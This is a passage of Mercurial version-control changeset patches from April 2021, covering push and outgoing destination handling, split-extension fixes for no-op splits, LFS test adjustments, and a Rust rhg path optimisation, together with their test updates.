ui, dests): """yields all the `path` selected as push destination by `dests`""" if not dests: - dests = [None] - for dest in dests: - yield ui.getpath(dest, default=(b'default-push', b'default')) + if b'default-push' in ui.paths: + yield ui.paths[b'default-push'] + elif b'default' in ui.paths: + yield ui.paths[b'default'] + else: + yield None + else: + for dest in dests: + yield ui.getpath(dest) def get_pull_paths(repo, ui, sources, default_branches=()): # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618320632 -7200 # Tue Apr 13 15:30:32 2021 +0200 # Node ID efadec3ea8e225cca6a8f30de20d5d17628c0832 # Parent 7061eee84151b4c7118c5b435840dab1bd305bc5 push-dests: move the code around missing default dest inside `get_push_paths` This function has a clear semantic and moving the code dealing with this inside it will help reduce duplication. Differential Revision: https://phab.mercurial-scm.org/D10385 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -5703,11 +5703,6 @@ some_pushed = False result = 0 for path in urlutil.get_push_paths(repo, ui, dests): - if not path: - raise error.ConfigError( - _(b'default repository not configured!'), - hint=_(b"see 'hg help config.paths'"), - ) dest = path.pushloc or path.loc branches = (path.branch, opts.get(b'branch') or []) ui.status(_(b'pushing to %s\n') % urlutil.hidepassword(dest)) diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -453,7 +453,10 @@ elif b'default' in ui.paths: yield ui.paths[b'default'] else: - yield None + raise error.ConfigError( + _(b'default repository not configured!'), + hint=_(b"see 'hg help config.paths'"), + ) else: for dest in dests: yield ui.getpath(dest) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618408423 -7200 # Wed Apr 14 15:53:43 2021 +0200 # Node ID 248cbe17320339f26003f2b54987e0b3a15835dd # Parent efadec3ea8e225cca6a8f30de20d5d17628c0832 run-test: make it clearer why we terminating process The --verbose log wer only talking about process termination. Now we have more information about why. Differential Revision: https://phab.mercurial-scm.org/D10394 diff --git a/tests/run-tests.py b/tests/run-tests.py --- a/tests/run-tests.py +++ b/tests/run-tests.py @@ -301,6 +301,7 @@ while time.time() - start < timeout and p.returncode is None: time.sleep(0.1) p.timeout = True + vlog('# Timout reached for process %d' % p.pid) if p.returncode is None: terminate(p) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618408472 -7200 # Wed Apr 14 15:54:32 2021 +0200 # Node ID 9799ba0abb12037b97fdccebead09d808c6d7660 # Parent 248cbe17320339f26003f2b54987e0b3a15835dd test-lfs: avoid pagination Otherwise, the pagination can trigger in when running the test with --debug, blocking the test execution for no good reason. Differential Revision: https://phab.mercurial-scm.org/D10395 diff --git a/tests/test-lfs-test-server.t b/tests/test-lfs-test-server.t --- a/tests/test-lfs-test-server.t +++ b/tests/test-lfs-test-server.t @@ -40,6 +40,8 @@ #endif $ cat >> $HGRCPATH <<EOF + > [ui] + > paginate=no > [experimental] > lfs.worker-enable = False > [extensions] # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618408581 -7200 # Wed Apr 14 15:56:21 2021 +0200 # Node ID 7a9b74e98240195f424ddddd2d701919bdb8bc2e # Parent 9799ba0abb12037b97fdccebead09d808c6d7660 test-lfs: avoid a bashism when spawning the server For zsh, this &> call is read as "& >", this spin the process without redirection. As a result the server grab stdout, which does not get closed at the end of the test. As a result `run-tests.py` hang there forever, waiting for the the stream for be close. (which is probably as issue on its own). Differential Revision: https://phab.mercurial-scm.org/D10396 diff --git a/tests/test-lfs-test-server.t b/tests/test-lfs-test-server.t --- a/tests/test-lfs-test-server.t +++ b/tests/test-lfs-test-server.t @@ -17,7 +17,7 @@ #endif #if no-windows git-server - $ lfs-test-server &> lfs-server.log & + $ lfs-test-server > lfs-server.log 2>&1 & $ echo $! >> $DAEMON_PIDS #endif @@ -890,7 +890,7 @@ $ mkdir $TESTTMP/lfs-server2 $ cd $TESTTMP/lfs-server2 #if no-windows git-server - $ lfs-test-server &> lfs-server.log & + $ lfs-test-server > lfs-server.log 2>&1 & $ echo $! >> $DAEMON_PIDS #endif # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618409352 -7200 # Wed Apr 14 16:09:12 2021 +0200 # Node ID 8f7b1bf3c540080345112ae06163271bd46ea576 # Parent 7a9b74e98240195f424ddddd2d701919bdb8bc2e test-lfs: fix expected output This is not covered by the CI and was broken. Differential Revision: https://phab.mercurial-scm.org/D10397 diff --git a/tests/test-lfs-test-server.t b/tests/test-lfs-test-server.t --- a/tests/test-lfs-test-server.t +++ b/tests/test-lfs-test-server.t @@ -115,7 +115,7 @@ Status: 200 (git-server !) Status: 201 (hg-server !) Content-Length: 0 - Content-Type: text/plain; charset=utf-8 + Content-Type: text/plain; charset=utf-8 (hg-server !) Date: $HTTP_DATE$ Server: testing stub value (hg-server !) lfs: processed: 31cf46fbc4ecd458a0943c5b4881f1f5a6dd36c53d6167d5b69ac45149b38e5b @@ -279,7 +279,7 @@ Status: 200 (git-server !) Status: 201 (hg-server !) Content-Length: 0 - Content-Type: text/plain; charset=utf-8 + Content-Type: text/plain; charset=utf-8 (hg-server !) Date: $HTTP_DATE$ Server: testing stub value (hg-server !) lfs: processed: 37a65ab78d5ecda767e8622c248b5dbff1e68b1678ab0e730d5eb8601ec8ad19 @@ -287,7 +287,7 @@ Status: 200 (git-server !) Status: 201 (hg-server !) Content-Length: 0 - Content-Type: text/plain; charset=utf-8 + Content-Type: text/plain; charset=utf-8 (hg-server !) Date: $HTTP_DATE$ Server: testing stub value (hg-server !) lfs: processed: d11e1a642b60813aee592094109b406089b8dff4cb157157f753418ec7857998 # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1618275116 25200 # Mon Apr 12 17:51:56 2021 -0700 # Node ID 17368844f786cfc9103b033c7c1756aab6d8eeb2 # Parent 8f7b1bf3c540080345112ae06163271bd46ea576 split: add test demonstrating issue with empty splits adjusting phases Differential Revision: https://phab.mercurial-scm.org/D10387 diff --git a/tests/test-split.t b/tests/test-split.t --- a/tests/test-split.t +++ b/tests/test-split.t @@ -1046,3 +1046,117 @@ [ ui.warning|rollback completed] [ ui.error|abort: empty commit message] [10] + +Test that creating an empty split or "no-op" +(identical to original) commit doesn't cause chaos +-------------------------------------------------- + + $ hg init $TESTTMP/noop + $ cd $TESTTMP/noop + $ echo r0 > r0 + $ hg ci -qAm r0 + $ hg phase -p + $ echo foo > foo + $ hg ci -qAm foo + $ hg log -G -T'{phase} {rev}:{node|short} {desc}' + @ draft 1:ae694b2901bb foo + | + o public 0:222799e2f90b r0 + +FIXME: This should not show "So far it has been split into" + $ printf 'd\na\n' | HGEDITOR=cat hg split || true + diff --git a/foo b/foo + new file mode 100644 + examine changes to 'foo'? + (enter ? for help) [Ynesfdaq?] d + + no changes to record + diff --git a/foo b/foo + new file mode 100644 + examine changes to 'foo'? + (enter ? for help) [Ynesfdaq?] a + + HG: Splitting ae694b2901bb. So far it has been split into: + HG: - 0:222799e2f90b "r0" + HG: Write commit message for the next split changeset. + foo + + + HG: Enter commit message. Lines beginning with 'HG:' are removed. + HG: Leave message empty to abort commit. + HG: -- + HG: user: test + HG: branch 'default' + HG: added foo + warning: commit already existed in the repository! + saved backup bundle to $TESTTMP/noop/.hg/strip-backup/ae694b2901bb-28e0b457-split.hg (obsstore-off !) + transaction abort! (obsstore-on !) + rollback completed (obsstore-on !) + abort: changeset ae694b2901bb cannot obsolete itself (obsstore-on !) +FIXME: this should not have stripped the commit we just no-op split +(obsstore-off only), or made r0 draft. + $ hg log -G -T'{phase} {rev}:{node|short} {desc}' + warning: ignoring unknown working parent ae694b2901bb! (obsstore-off !) + @ draft 1:ae694b2901bb foo (obsstore-on !) + | (obsstore-on !) + o public 0:222799e2f90b r0 (obsstore-on !) + o draft 0:222799e2f90b r0 (obsstore-off !) + + +Now try the same thing but modifying the message so we don't trigger the +identical changeset failures + + $ hg init $TESTTMP/noop2 + $ cd $TESTTMP/noop2 + $ echo r0 > r0 + $ hg ci -qAm r0 + $ hg phase -p + $ echo foo > foo + $ hg ci -qAm foo + $ hg log -G -T'{phase} {rev}:{node|short} {desc}' + @ draft 1:ae694b2901bb foo + | + o public 0:222799e2f90b r0 + + $ cat > $TESTTMP/messages <<EOF + > message1 + > EOF +FIXME: This should not show "So far it has been split into" + $ printf 'd\na\n' | HGEDITOR="\"$PYTHON\" $TESTTMP/editor.py" hg split + diff --git a/foo b/foo + new file mode 100644 + examine changes to 'foo'? + (enter ? for help) [Ynesfdaq?] d + + no changes to record + diff --git a/foo b/foo + new file mode 100644 + examine changes to 'foo'? + (enter ? for help) [Ynesfdaq?] a + + EDITOR: HG: Splitting ae694b2901bb. So far it has been split into: + EDITOR: HG: - 0:222799e2f90b "r0" + EDITOR: HG: Write commit message for the next split changeset. + EDITOR: foo + EDITOR: + EDITOR: + EDITOR: HG: Enter commit message. Lines beginning with 'HG:' are removed. + EDITOR: HG: Leave message empty to abort commit. + EDITOR: HG: -- + EDITOR: HG: user: test + EDITOR: HG: branch 'default' + EDITOR: HG: added foo + created new head + saved backup bundle to $TESTTMP/noop2/.hg/strip-backup/ae694b2901bb-28e0b457-split.hg (obsstore-off !) +FIXME: this should not have made r0 draft + $ hg log -G -T'{phase} {rev}:{node|short} {desc}' + @ draft 1:de675559d3f9 message1 (obsstore-off !) + @ draft 2:de675559d3f9 message1 (obsstore-on !) + | + o draft 0:222799e2f90b r0 + +#if obsstore-on +FIXME: this should not have marked 222799e (r0) as a precursor of anything. + $ hg debugobsolete + ae694b2901bb8b0f8c4b5e075ddec0d63468d57a 222799e2f90be09ccbe49f519c4615d8375a9242 de675559d3f93ffc822c6eb7490e5c73033f17c7 0 * (glob) +#endif # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1618275166 25200 # Mon Apr 12 17:52:46 2021 -0700 # Node ID 8ee1ac083ee743c9416af8666f5124c62147ceaa # Parent 17368844f786cfc9103b033c7c1756aab6d8eeb2 split: fix issue with empty splits adjusting phases Differential Revision: https://phab.mercurial-scm.org/D10388 diff --git a/hgext/split.py b/hgext/split.py --- a/hgext/split.py +++ b/hgext/split.py @@ -171,9 +171,13 @@ b'message': header + ctx.description(), } ) + origctx = repo[b'.'] commands.commit(ui, repo, **pycompat.strkwargs(opts)) newctx = repo[b'.'] - committed.append(newctx) + # Ensure user didn't do a "no-op" split (such as deselecting + # everything). + if origctx.node() != newctx.node(): + committed.append(newctx) if not committed: raise error.InputError(_(b'cannot split an empty revision')) diff --git a/tests/test-split.t b/tests/test-split.t --- a/tests/test-split.t +++ b/tests/test-split.t @@ -1063,7 +1063,6 @@ | o public 0:222799e2f90b r0 -FIXME: This should not show "So far it has been split into" $ printf 'd\na\n' | HGEDITOR=cat hg split || true diff --git a/foo b/foo new file mode 100644 @@ -1076,9 +1075,7 @@ examine changes to 'foo'? (enter ? for help) [Ynesfdaq?] a - HG: Splitting ae694b2901bb. So far it has been split into: - HG: - 0:222799e2f90b "r0" - HG: Write commit message for the next split changeset. + HG: Splitting ae694b2901bb. Write commit message for the first split changeset. foo @@ -1094,13 +1091,12 @@ rollback completed (obsstore-on !) abort: changeset ae694b2901bb cannot obsolete itself (obsstore-on !) FIXME: this should not have stripped the commit we just no-op split -(obsstore-off only), or made r0 draft. +(obsstore-off only) $ hg log -G -T'{phase} {rev}:{node|short} {desc}' warning: ignoring unknown working parent ae694b2901bb! (obsstore-off !) @ draft 1:ae694b2901bb foo (obsstore-on !) | (obsstore-on !) - o public 0:222799e2f90b r0 (obsstore-on !) - o draft 0:222799e2f90b r0 (obsstore-off !) + o public 0:222799e2f90b r0 Now try the same thing but modifying the message so we don't trigger the @@ -1121,7 +1117,6 @@ $ cat > $TESTTMP/messages <<EOF > message1 > EOF -FIXME: This should not show "So far it has been split into" $ printf 'd\na\n' | HGEDITOR="\"$PYTHON\" $TESTTMP/editor.py" hg split diff --git a/foo b/foo new file mode 100644 @@ -1134,9 +1129,7 @@ examine changes to 'foo'? (enter ? for help) [Ynesfdaq?] a - EDITOR: HG: Splitting ae694b2901bb. So far it has been split into: - EDITOR: HG: - 0:222799e2f90b "r0" - EDITOR: HG: Write commit message for the next split changeset. + EDITOR: HG: Splitting ae694b2901bb. Write commit message for the first split changeset. EDITOR: foo EDITOR: EDITOR: @@ -1148,15 +1141,13 @@ EDITOR: HG: added foo created new head saved backup bundle to $TESTTMP/noop2/.hg/strip-backup/ae694b2901bb-28e0b457-split.hg (obsstore-off !) -FIXME: this should not have made r0 draft $ hg log -G -T'{phase} {rev}:{node|short} {desc}' @ draft 1:de675559d3f9 message1 (obsstore-off !) @ draft 2:de675559d3f9 message1 (obsstore-on !) | - o draft 0:222799e2f90b r0 + o public 0:222799e2f90b r0 #if obsstore-on -FIXME: this should not have marked 222799e (r0) as a precursor of anything. $ hg debugobsolete - ae694b2901bb8b0f8c4b5e075ddec0d63468d57a 222799e2f90be09ccbe49f519c4615d8375a9242 de675559d3f93ffc822c6eb7490e5c73033f17c7 0 * (glob) + ae694b2901bb8b0f8c4b5e075ddec0d63468d57a de675559d3f93ffc822c6eb7490e5c73033f17c7 0 * (glob) #endif # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1618280734 25200 # Mon Apr 12 19:25:34 2021 -0700 # Node ID ca0049946e9a36ccc4e3e399e0abd577337d9492 # Parent 8ee1ac083ee743c9416af8666f5124c62147ceaa split: avoid strip if split is a no-op (identical to original) Differential Revision: https://phab.mercurial-scm.org/D10389 diff --git a/hgext/split.py b/hgext/split.py --- a/hgext/split.py +++ b/hgext/split.py @@ -182,12 +182,15 @@ if not committed: raise error.InputError(_(b'cannot split an empty revision')) - scmutil.cleanupnodes( - repo, - {ctx.node(): [c.node() for c in committed]}, - operation=b'split', - fixphase=True, - ) + if len(committed) != 1 or committed[0].node() != ctx.node(): + # Ensure we don't strip a node if we produce the same commit as already + # exists + scmutil.cleanupnodes( + repo, + {ctx.node(): [c.node() for c in committed]}, + operation=b'split', + fixphase=True, + ) return committed[-1] diff --git a/tests/test-split.t b/tests/test-split.t --- a/tests/test-split.t +++ b/tests/test-split.t @@ -1086,16 +1086,9 @@ HG: branch 'default' HG: added foo warning: commit already existed in the repository! - saved backup bundle to $TESTTMP/noop/.hg/strip-backup/ae694b2901bb-28e0b457-split.hg (obsstore-off !) - transaction abort! (obsstore-on !) - rollback completed (obsstore-on !) - abort: changeset ae694b2901bb cannot obsolete itself (obsstore-on !) -FIXME: this should not have stripped the commit we just no-op split -(obsstore-off only) $ hg log -G -T'{phase} {rev}:{node|short} {desc}' - warning: ignoring unknown working parent ae694b2901bb! (obsstore-off !) - @ draft 1:ae694b2901bb foo (obsstore-on !) - | (obsstore-on !) + @ draft 1:ae694b2901bb foo + | o public 0:222799e2f90b r0 # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615625434 -3600 # Sat Mar 13 09:50:34 2021 +0100 # Node ID b5e8bf10436e24a111ec48a7a28edddf43fa12d6 # Parent ca0049946e9a36ccc4e3e399e0abd577337d9492 rhg: Make `files` work on repo-relative paths when possible When the current directory is outside of the repository we need to turn everything into absolute filesystem paths in order to compute correct relative paths. This was previously done unconditionally, but is not necessary when the current directory is inside the repository. With this change `rhg files > /dev/null` at the root of a mozilla-central snapshot goes from ~150 ms to ~70 ms. My repository is located at a somewhat long path though (93 bytes). The effect may not be as pronounced at a shorter path. Differential Revision: https://phab.mercurial-scm.org/D10200 diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -53,21 +53,35 @@ repo: &Repo, files: impl IntoIterator<Item = &'a HgPath>, ) -> Result<(), CommandError> { - let cwd = HgPathBuf::from(get_bytes_from_path(hg::utils::current_dir()?)); - let working_directory = repo.working_directory_path(); - let working_directory = current_dir()?.join(working_directory); // Make it absolute - let working_directory = - HgPathBuf::from(get_bytes_from_path(working_directory)); - let mut stdout = ui.stdout_buffer(); + let cwd = current_dir()?; + let working_directory = repo.working_directory_path(); + let working_directory = cwd.join(working_directory); // Make it absolute + let mut any = false; - for file in files { - any = true; - let file = working_directory.join(file); - stdout.write_all(relativize_path(&file, &cwd).as_ref())?; - stdout.write_all(b"\n")?; + if let Ok(cwd_relative_to_repo) = cwd.strip_prefix(&working_directory) { + // The current directory is inside the repo, so we can work with + // relative paths + let cwd = HgPathBuf::from(get_bytes_from_path(cwd_relative_to_repo)); + for file in files { + any = true; + stdout.write_all(relativize_path(&file, &cwd).as_ref())?; + stdout.write_all(b"\n")?; + } + } else { + let working_directory = + HgPathBuf::from(get_bytes_from_path(working_directory)); + let cwd = HgPathBuf::from(get_bytes_from_path(cwd)); + for file in files { + any = true; + // Absolute path in the filesystem + let file = working_directory.join(file); + stdout.write_all(relativize_path(&file, &cwd).as_ref())?; + stdout.write_all(b"\n")?; + } } + stdout.flush()?; if any { Ok(()) # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1618284714 14400 # Mon Apr 12 23:31:54 2021 -0400 # Node ID 9c3e8456907178b2160e180e0a07b49292bc91c1 # Parent b5e8bf10436e24a111ec48a7a28edddf43fa12d6 re2: adjust local variable assignment scope Pytype flagged the exception handler where these are used as `[name-error]`, and PyCharm complained they may be used before assignment. Differential Revision: https://phab.mercurial-scm.org/D10376 diff --git a/mercurial/util.py b/mercurial/util.py --- a/mercurial/util.py +++ b/mercurial/util.py @@ -2189,10 +2189,11 @@ def _checkre2(self): global _re2 global _re2_input + + check_pattern = br'\[([^\[]+)\]' + check_input = b'[ui]' try: # check if match works, see issue3964 - check_pattern = br'\[([^\[]+)\]' - check_input = b'[ui]' _re2 = bool(re2.match(check_pattern, check_input)) except ImportError: _re2 = False # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1617892873 -7200 # Thu Apr 08 16:41:13 2021 +0200 # Node ID cdbef062c6c8a2409caf0d22d75e0f08ff4758fb # Parent 9c3e8456907178b2160e180e0a07b49292bc91c1 changegroup: update comment Gratuitous fix, I stumbled upon this comment while reading code. Differential Revision: https://phab.mercurial-scm.org/D10339 diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -570,7 +570,7 @@ """ chain = None for chunkdata in iter(lambda: self.deltachunk(chain), {}): - # Chunkdata: (node, p1, p2, cs, deltabase, delta, flags) + # Chunkdata: (node, p1, p2, cs, deltabase, delta, flags, sidedata) yield chunkdata chain = chunkdata[0] # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1618455041 14400 # Wed Apr 14 22:50:41 2021 -0400 # Node ID 93c224dc099b6585f72df95a52d7d90226bb9cf0 # Parent cdbef062c6c8a2409caf0d22d75e0f08ff4758fb urlutil: use bytes for Abort messages Caught by pytype. Also fix a minor grammar issue in the second message. Differential Revision: https://phab.mercurial-scm.org/D10433 diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -643,11 +643,11 @@ try: subpath = paths[self.url.host] except KeyError: - m = _('cannot use `%s`, "%s" is not a known path') + m = _(b'cannot use `%s`, "%s" is not a known path') m %= (self.rawloc, self.url.host) raise error.Abort(m) if subpath.raw_url.scheme == b'path': - m = _('cannot use `%s`, "%s" is also define as a `path://`') + m = _(b'cannot use `%s`, "%s" is also defined as a `path://`') m %= (self.rawloc, self.url.host) raise error.Abort(m) self.url = subpath.url diff --git a/tests/test-paths.t b/tests/test-paths.t --- a/tests/test-paths.t +++ b/tests/test-paths.t @@ -348,10 +348,10 @@ $ hg id 000000000000 $ hg path - abort: cannot use `path://other_default`, "other_default" is also define as a `path://` + abort: cannot use `path://other_default`, "other_default" is also defined as a `path://` [255] $ hg pull chain_path - abort: cannot use `path://other_default`, "other_default" is also define as a `path://` + abort: cannot use `path://other_default`, "other_default" is also defined as a `path://` [255] Doing an actual circle should always be an issue @@ -365,10 +365,10 @@ $ hg id 000000000000 $ hg path - abort: cannot use `path://other_default`, "other_default" is also define as a `path://` + abort: cannot use `path://other_default`, "other_default" is also defined as a `path://` [255] $ hg pull chain_path - abort: cannot use `path://other_default`, "other_default" is also define as a `path://` + abort: cannot use `path://other_default`, "other_default" is also defined as a `path://` [255] Test basic error cases # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618471399 -7200 # Thu Apr 15 09:23:19 2021 +0200 # Node ID 5a59a0ed0a379df7b19243ea739bee5422afd722 # Parent 93c224dc099b6585f72df95a52d7d90226bb9cf0 subrepo: introduce a `repo_rel_or_abs_source` function The `subrepoutil` module has various function to compute the path of a sub-repository compared to the root of the top repository. However, they was no function available to compute the relative path of the repository "source". And we need this information for exchange operation (in our case, `hg outgoing`). The information is currently build using the `repo._subtoppath` hack. We reuse the same logic but in a dedicated function independent of the `repo._subtoppath` hack. Differential Revision: https://phab.mercurial-scm.org/D10434 diff --git a/mercurial/subrepoutil.py b/mercurial/subrepoutil.py --- a/mercurial/subrepoutil.py +++ b/mercurial/subrepoutil.py @@ -383,6 +383,24 @@ return subs, commitsubs, newstate +def repo_rel_or_abs_source(repo): + """return the source of this repo + + Either absolute or relative the outermost repo""" + parent = repo + chunks = [] + while util.safehasattr(parent, b'_subparent'): + source = urlutil.url(parent._subsource) + chunks.append(bytes(source)) + if source.isabs(): + break + parent = parent._subparent + + chunks.reverse() + path = posixpath.join(*chunks) + return posixpath.normpath(path) + + def reporelpath(repo): # type: (localrepo.localrepository) -> bytes """return path to this (sub)repo as seen from outermost repo""" # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618471408 -7200 # Thu Apr 15 09:23:28 2021 +0200 # Node ID 0afe96e374a79e4d776606bf73e79230db474ec3 # Parent 5a59a0ed0a379df7b19243ea739bee5422afd722 outgoing: pass subrepo path using function argument instead of abssource hack This is clearer, remove the needs for the `repo._subtoppath` hack and will make our live easier when making `outgoing` accept multiple destinations. Differential Revision: https://phab.mercurial-scm.org/D10390 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -4985,11 +4985,7 @@ finally: other.close() - repo._subtoppath = path.pushloc or path.loc - try: - return hg.outgoing(ui, repo, dest, opts) - finally: - del repo._subtoppath + return hg.outgoing(ui, repo, dest, opts) @command( diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -1320,7 +1320,7 @@ return _incoming(display, subreporecurse, ui, repo, source, opts) -def _outgoing(ui, repo, dest, opts): +def _outgoing(ui, repo, dest, opts, subpath=None): path = ui.getpath(dest, default=(b'default-push', b'default')) if not path: raise error.Abort( @@ -1328,6 +1328,15 @@ hint=_(b"see 'hg help config.paths'"), ) dest = path.pushloc or path.loc + if subpath is not None: + subpath = urlutil.url(subpath) + if subpath.isabs(): + dest = bytes(subpath) + else: + p = urlutil.url(dest) + p.path = os.path.normpath(b'%s/%s' % (p.path, subpath)) + dest = bytes(p) + branches = path.branch, opts.get(b'branch') or [] ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) @@ -1382,10 +1391,10 @@ yield n -def outgoing(ui, repo, dest, opts): +def outgoing(ui, repo, dest, opts, subpath=None): if opts.get(b'graph'): logcmdutil.checkunsupportedgraphflags([], opts) - o, other = _outgoing(ui, repo, dest, opts) + o, other = _outgoing(ui, repo, dest, opts, subpath=subpath) ret = 1 try: if o: diff --git a/mercurial/subrepo.py b/mercurial/subrepo.py --- a/mercurial/subrepo.py +++ b/mercurial/subrepo.py @@ -873,7 +873,8 @@ opts = copy.copy(opts) opts.pop(b'rev', None) opts.pop(b'branch', None) - return hg.outgoing(ui, self._repo, _abssource(self._repo, True), opts) + subpath = subrepoutil.repo_rel_or_abs_source(self._repo) + return hg.outgoing(ui, self._repo, dest, opts, subpath=subpath) @annotatesubrepoerror def incoming(self, ui, source, opts): # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618356404 -7200 # Wed Apr 14 01:26:44 2021 +0200 # Node ID d4e4ccb75f99f24baa5912885d9360dd5e87cda3 # Parent 0afe96e374a79e4d776606bf73e79230db474ec3 outgoing: accept multiple destinations This align the behavior of `hg outgoing` with the one of `hg incoming`. In addition this prepare the introduction of having simple `path` resolve to multiple destination in practice (eg: `default`) Differential Revision: https://phab.mercurial-scm.org/D10391 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -4923,10 +4923,10 @@ + logopts + remoteopts + subrepoopts, - _(b'[-M] [-p] [-n] [-f] [-r REV]... [DEST]'), + _(b'[-M] [-p] [-n] [-f] [-r REV]... [DEST]...'), helpcategory=command.CATEGORY_REMOTE_REPO_MANAGEMENT, ) -def outgoing(ui, repo, dest=None, **opts): +def outgoing(ui, repo, *dests, **opts): """show changesets not found in the destination Show changesets not found in the specified destination repository @@ -4962,30 +4962,24 @@ Returns 0 if there are outgoing changes, 1 otherwise. """ - # hg._outgoing() needs to re-resolve the path in order to handle #branch - # style URLs, so don't overwrite dest. - path = ui.getpath(dest, default=(b'default-push', b'default')) - if not path: - raise error.ConfigError( - _(b'default repository not configured!'), - hint=_(b"see 'hg help config.paths'"), - ) - opts = pycompat.byteskwargs(opts) if opts.get(b'bookmarks'): - dest = path.pushloc or path.loc - other = hg.peer(repo, opts, dest) - try: - if b'bookmarks' not in other.listkeys(b'namespaces'): - ui.warn(_(b"remote doesn't support bookmarks\n")) - return 0 - ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) - ui.pager(b'outgoing') - return bookmarks.outgoing(ui, repo, other) - finally: - other.close() - - return hg.outgoing(ui, repo, dest, opts) + for path in urlutil.get_push_paths(repo, ui, dests): + dest = path.pushloc or path.loc + other = hg.peer(repo, opts, dest) + try: + if b'bookmarks' not in other.listkeys(b'namespaces'): + ui.warn(_(b"remote doesn't support bookmarks\n")) + return 0 + ui.status( + _(b'comparing with %s\n') % urlutil.hidepassword(dest) + ) + ui.pager(b'outgoing') + return bookmarks.outgoing(ui, repo, other) + finally: + other.close() + + return hg.outgoing(ui, repo, dests, opts) @command( diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -1320,51 +1320,53 @@ return _incoming(display, subreporecurse, ui, repo, source, opts) -def _outgoing(ui, repo, dest, opts, subpath=None): - path = ui.getpath(dest, default=(b'default-push', b'default')) - if not path: - raise error.Abort( - _(b'default repository not configured!'), - hint=_(b"see 'hg help config.paths'"), - ) - dest = path.pushloc or path.loc - if subpath is not None: - subpath = urlutil.url(subpath) - if subpath.isabs(): - dest = bytes(subpath) - else: - p = urlutil.url(dest) - p.path = os.path.normpath(b'%s/%s' % (p.path, subpath)) - dest = bytes(p) +def _outgoing(ui, repo, dests, opts, subpath=None): + out = set() + others = [] + for path in urlutil.get_push_paths(repo, ui, dests): + dest = path.pushloc or path.loc + if subpath is not None: + subpath = urlutil.url(subpath) + if subpath.isabs(): + dest = bytes(subpath) + else: + p = urlutil.url(dest) + p.path = os.path.normpath(b'%s/%s' % (p.path, subpath)) + dest = bytes(p) + branches = path.branch, opts.get(b'branch') or [] - branches = path.branch, opts.get(b'branch') or [] - - ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) - revs, checkout = addbranchrevs(repo, repo, branches, opts.get(b'rev')) - if revs: - revs = [repo[rev].node() for rev in scmutil.revrange(repo, revs)] + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) + revs, checkout = addbranchrevs(repo, repo, branches, opts.get(b'rev')) + if revs: + revs = [repo[rev].node() for rev in scmutil.revrange(repo, revs)] - other = peer(repo, opts, dest) - try: - outgoing = discovery.findcommonoutgoing( - repo, other, revs, force=opts.get(b'force') - ) - o = outgoing.missing - if not o: - scmutil.nochangesfound(repo.ui, repo, outgoing.excluded) - return o, other - except: # re-raises - other.close() - raise + other = peer(repo, opts, dest) + try: + outgoing = discovery.findcommonoutgoing( + repo, other, revs, force=opts.get(b'force') + ) + o = outgoing.missing + out.update(o) + if not o: + scmutil.nochangesfound(repo.ui, repo, outgoing.excluded) + others.append(other) + except: # re-raises + other.close() + raise + # make sure this is ordered by revision number + outgoing_revs = list(out) + cl = repo.changelog + outgoing_revs.sort(key=cl.rev) + return outgoing_revs, others -def _outgoing_recurse(ui, repo, dest, opts): +def _outgoing_recurse(ui, repo, dests, opts): ret = 1 if opts.get(b'subrepos'): ctx = repo[None] for subpath in sorted(ctx.substate): sub = ctx.sub(subpath) - ret = min(ret, sub.outgoing(ui, dest, opts)) + ret = min(ret, sub.outgoing(ui, dests, opts)) return ret @@ -1391,10 +1393,10 @@ yield n -def outgoing(ui, repo, dest, opts, subpath=None): +def outgoing(ui, repo, dests, opts, subpath=None): if opts.get(b'graph'): logcmdutil.checkunsupportedgraphflags([], opts) - o, other = _outgoing(ui, repo, dest, opts, subpath=subpath) + o, others = _outgoing(ui, repo, dests, opts, subpath=subpath) ret = 1 try: if o: @@ -1415,11 +1417,13 @@ for n in _outgoing_filter(repo, o, opts): displayer.show(repo[n]) displayer.close() - cmdutil.outgoinghooks(ui, repo, other, opts, o) - ret = min(ret, _outgoing_recurse(ui, repo, dest, opts)) + for oth in others: + cmdutil.outgoinghooks(ui, repo, oth, opts, o) + ret = min(ret, _outgoing_recurse(ui, repo, dests, opts)) return ret # exit code is zero since we found outgoing changes finally: - other.close() + for oth in others: + oth.close() def verify(repo, level=None): diff --git a/tests/test-exchange-multi-source.t b/tests/test-exchange-multi-source.t --- a/tests/test-exchange-multi-source.t 